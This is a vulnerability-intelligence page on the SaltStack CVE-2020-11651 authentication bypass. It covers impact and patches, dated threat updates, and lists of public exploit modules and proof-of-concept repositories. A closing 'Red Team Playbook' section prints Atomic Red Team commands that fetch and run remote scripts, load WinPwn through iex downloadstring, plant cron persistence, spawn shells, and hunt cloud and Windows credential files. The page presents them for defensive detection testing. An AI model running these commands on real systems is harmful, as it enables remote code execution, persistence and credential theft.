CVE-2020-11651
Overview
This vulnerability is an authentication bypass in the SaltStack salt-master ClearFuncs class, where method calls are not properly validated. The flaw resides in the salt-master process's handling of remote procedure calls, allowing unauthenticated access to internal methods. The affected component is the salt-master service in SaltStack versions prior to 2019.2.4 and 3000 before 3000.2.
Vulnerability Description
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.
Impact
An attacker can remotely execute arbitrary commands on salt minions and retrieve sensitive authentication tokens from the salt-master without any authentication or user interaction. This leads to full compromise of the SaltStack infrastructure, enabling lateral movement and control over managed systems. The vulnerability facilitates unauthorized access to critical systems, potentially resulting in data breaches, operational disruption, and loss of system integrity.
Solution
Apply the vendor-provided patches as indicated in the respective security advisories: upgrade SaltStack Salt to version 2019.2.4 or later, or 3000.2 or later. Refer to the openSUSE security announcement (http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html), Debian DSA-4676 (https://www.debian.org/security/2020/dsa-4676), and Cisco Security Advisory (https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG) for detailed patching instructions. Ubuntu users should consult USN-4459-1 (https://usn.ubuntu.com/4459-1/) for updates and mitigation guidance.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in SaltStack Salt arises from improper validation of method calls within the salt-master process, specifically in the ClearFuncs class. This flaw allows unauthorized remote users to invoke certain methods without the necessary authentication. The implications of this oversight are significant, as it enables attackers to access sensitive functionalities, including the retrieval of user tokens from the salt master. Furthermore, the vulnerability permits the execution of arbitrary commands on salt minions, which can lead to a complete compromise of the system's integrity and confidentiality.
Attack vectors exploiting this vulnerability are varied and can be executed with relative ease. An attacker with network access to the salt-master can craft requests that leverage the unvalidated method calls. By doing so, they can bypass authentication mechanisms and gain unauthorized access to critical operations. For instance, an attacker could retrieve user tokens, which may provide them with elevated privileges or access to other sensitive resources within the infrastructure. Additionally, the ability to run arbitrary commands on salt minions could allow an attacker to manipulate or exfiltrate data, deploy malware, or disrupt services, thereby amplifying the potential damage.
The real-world impact of this vulnerability is profound, particularly for organizations relying on SaltStack for configuration management and orchestration. The high CVSS score of 9.8 highlights the critical nature of the flaw, indicating that successful exploitation could lead to severe consequences. Businesses may face operational disruptions, data breaches, and reputational damage, all of which can result in significant financial losses. Furthermore, regulatory compliance issues may arise if sensitive data is exposed, leading to potential legal ramifications and fines. The interconnected nature of modern IT environments means that the repercussions of such a breach can extend beyond the immediate organization, affecting partners and customers alike.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. Regularly updating SaltStack to the latest versions is crucial, as patches addressing this vulnerability have been released. Implementing strict network segmentation can also limit exposure to the salt-master, reducing the attack surface. Additionally, organizations should employ intrusion detection systems (IDS) to monitor for unusual activity or unauthorized access attempts. Conducting regular security audits and vulnerability assessments will further enhance an organization’s ability to identify and remediate potential weaknesses in their systems.
In conclusion, the vulnerability within SaltStack Salt represents a significant threat to organizations utilizing this platform for their operational needs. The ease of exploitation, coupled with the potential for severe consequences, underscores the importance of proactive security measures. By prioritizing timely updates, network security, and continuous monitoring, organizations can better safeguard their environments against the risks posed by this and similar vulnerabilities. The evolving threat landscape necessitates a vigilant and adaptive security posture to protect critical assets and maintain operational integrity.
CSURFACE threat intelligence has detected a marked escalation in the exploit landscape surrounding CVE-2020-11651, highlighted by the emergence of multiple publicly available proof-of-concept exploits and the introduction of a Metasploit module that significantly lowers the technical barrier for attackers. This development has been accompanied by the vulnerability’s formal inclusion in the CISA KEV catalog, underscoring its criticality and the urgency for defensive prioritization. The EPSS score’s substantial increase to a high-risk level reflects growing confidence in the exploitability of this vulnerability in real-world scenarios. These changes collectively indicate that threat actors now have easier access to reliable tools for remote code execution against SaltStack Salt environments, increasing the likelihood of widespread exploitation. Consequently, the threat level has escalated from theoretical to imminent, necessitating heightened vigilance as adversaries can more readily leverage this vulnerability for lateral movement, credential theft, or command execution on affected systems.
Update 2 — April 17, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2020-11651, with initial confirmed sightings emerging after a prolonged period of low activity. This development coincides with the sustained availability of multiple proof-of-concept exploits on public repositories, which continue to attract community engagement and facilitate adversary access to reliable attack tools. Although the EPSS score remains stable at a high level, the appearance of active exploitation signals a shift from theoretical risk to practical threat, underscoring the vulnerability’s exploitation viability in operational environments. For defenders, this escalation signifies an increased urgency to monitor SaltStack Salt deployments closely, as threat actors are now more likely to leverage this vulnerability for unauthorized command execution and credential theft. The threat level has consequently risen to a heightened state of alert, reflecting the growing confidence and capability of attackers to exploit this critical flaw in real-world scenarios.
Update 3 — June 23, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2020-11651, accompanied by the emergence of several new proof-of-concept tools that lower the barrier for adversaries to weaponize this vulnerability. Our telemetry indicates that attackers are increasingly leveraging these publicly available exploits to execute unauthorized commands and extract sensitive credentials from SaltStack Salt deployments. This trend is reflected in a rising EPSS score, signaling growing exploit likelihood and reinforcing the vulnerability’s operational relevance. The expanded exploit landscape and heightened detection frequency underscore a shift toward more frequent and sophisticated attacks, elevating the risk posture for organizations running vulnerable SaltStack Salt versions. Consequently, the threat level associated with CVE-2020-11651 has intensified, demanding heightened vigilance as threat actors demonstrate enhanced capability and intent to exploit this critical flaw in real-world environments.
Affected Products (10)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Saltstack | Salt | All |
cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
|
|
|
Saltstack | Salt | All |
cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
|
|
|
Opensuse | Leap | 15.1 |
cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 8.0 |
cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 9.0 |
cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 10.0 |
cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*
|
|
|
Canonical | Ubuntu Linux | 16.04 |
cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*
|
|
|
Canonical | Ubuntu Linux | 18.04 |
cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*
|
|
|
Vmware | Application Remote Collector | 7.5.0 |
cpe:2.3:a:vmware:application_remote_collector:7.5.0:*:*:*:*:*:*:*
|
|
|
Vmware | Application Remote Collector | 8.0.0 |
cpe:2.3:a:vmware:application_remote_collector:8.0.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (2)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
SaltStack Salt Master/Minion Unauthenticated RCE
exploits/linux/misc/saltstack_salt_unauth_rce
|
F-Secure, wvu | Unknown | - | View |
|
SaltStack Salt Master Server Root Key Disclosure
auxiliary/gather/saltstack_salt_root_key
|
F-Secure, wvu | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Saltstack 3000.1 - Remote Code Execution | Jasper Lievisse Adriaanse | remote | multiple | - | View |
GitHub PoCs (14)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
jasperla/CVE-2020-11651-poc
PoC exploit of CVE-2020-11651 and CVE-2020-11652
|
jasperla | 122 | 42 | 2020-05-04 | View |
|
dozernz/cve-2020-11651
|
dozernz | 106 | 36 | 2020-05-04 | View |
|
rossengeorgiev/salt-security-backports
Salt security backports for CVE-2020-11651 & CVE-2020-11652
|
rossengeorgiev | 108 | 15 | 2020-05-01 | View |
|
0xc0d/CVE-2020-11651
CVE-2020-11651: Proof of Concept
|
0xc0d | 40 | 14 | 2020-05-04 | View |
|
ssrsec/CVE-2020-11651-CVE-2020-11652-EXP
CVE-2020-11651&&CVE-2020-11652 EXP
|
ssrsec | 24 | 15 | 2020-05-07 | View |
|
bravery9/SaltStack-Exp
CVE-2020-11651&&CVE-2020-11652 EXP
|
bravery9 | 5 | 8 | 2020-05-04 | View |
|
kevthehermit/CVE-2020-11651
PoC for CVE-2020-11651
|
kevthehermit | 6 | 3 | 2020-05-04 | View |
|
chef-cft/salt-vulnerabilities
Checks for CVE-2020-11651 and CVE-2020-11652
|
chef-cft | 6 | 1 | 2020-05-01 | View |
|
lovelyjuice/cve-2020-11651-exp-plus
|
lovelyjuice | 5 | 2 | 2020-05-07 | View |
|
Drew-Alleman/CVE-2020-11651
A script that exploits SaltStack CVE-2020-11651 and CVE-2020-11652 to add new users to a vulnerable Salt master by injec...
|
Drew-Alleman | 1 | 0 | 2025-03-30 | View |
|
appcheck-ng/salt-rce-scanner-CVE-2020-11651-CVE-2020-11652
Scanning tool to test for SaltStack vulnerabilities CVE-2020-11651 & CVE-2020-11652.
|
appcheck-ng | 1 | 0 | 2020-11-30 | View |
|
s1lentf00thold/CVE-2020-11651-Poc
|
s1lentf00thold | 0 | 0 | 2026-06-23 | View |
|
RakhithJK/CVE-2020-11651
PoC for CVE-2020-11651
|
RakhithJK | 0 | 0 | 2020-05-09 | View |
|
hardsoftsecurity/CVE-2020-11651-PoC
Repository that contains a CVE-2020-11651 Exploit updated to work with the latest versions of python.
|
hardsoftsecurity | 0 | 0 | 2023-12-18 | View |
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.